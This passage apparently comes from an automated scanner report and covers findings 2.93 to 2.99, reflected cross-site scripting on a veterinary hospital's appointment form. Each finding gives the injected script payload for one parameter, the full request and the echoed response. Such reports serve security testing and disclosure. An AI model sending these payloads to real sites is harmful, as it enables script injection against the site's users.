%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=utsbm26ngjhc03ls4mkecbg4h6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AMd75d4"><script>alert(1)</script>ec5002bcf17 &appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterina...[SNIP]...
2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the appt_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd652"><script>alert(1)</script>e99070fd4e0 was submitted in the appt_type parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0 &client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:29 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1toj3kbv807ruru63hn2ttm475; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=apptbd652"><script>alert(1)</script>e99070fd4e0 &client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&sub...[SNIP]...
2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd70d"><script>alert(1)</script>a6d35f88597 was submitted in the client parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597 &date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=euqdou5q6pfmhvgk2m2b42b3p0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=currentbd70d"><script>alert(1)</script>a6d35f88597 &date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+...[SNIP]...
2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the date1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c1c6"><script>alert(1)</script>979dba9c0db was submitted in the date1 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=8c1c6"><script>alert(1)</script>979dba9c0db &date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=gn0lqn96h1dui1eed4jku5k8m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input name="date1" id="date1" type="text" size="20" maxlength="50" value="8c1c6"><script>alert(1)</script>979dba9c0db " class="datepicker" />...[SNIP]...
2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the date2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96695"><script>alert(1)</script>9ca6b41fe54 was submitted in the date2 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=96695"><script>alert(1)</script>9ca6b41fe54 &date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=m28f2rol7ucndmddriq23vq4j7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input name="date2" id="date2" type="text" size="20" maxlength="50" value="96695"><script>alert(1)</script>9ca6b41fe54 " class="datepicker" />...[SNIP]...
2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the date3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fca"><script>alert(1)</script>838dd1f40b2 was submitted in the date3 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=99fca"><script>alert(1)</script>838dd1f40b2 &doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4slqhv122b9dscf15gqhml0ng4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input name="date3" id="date3" type="text" size="20" maxlength="50" value="99fca"><script>alert(1)</script>838dd1f40b2 " class="datepicker" />...[SNIP]...
2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the doctor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23546"><script>alert(1)</script>3e62334127d was submitted in the doctor parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d &email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:57 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=rbfveb3tt0865o46p3m6n44jl1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 23515 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... pe="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d &email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&tim...[SNIP]...
2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a16"><script>alert(1)</script>b7c615c11f4 was submitted in the email parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=15a16"><script>alert(1)</script>b7c615c11f4 &fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ip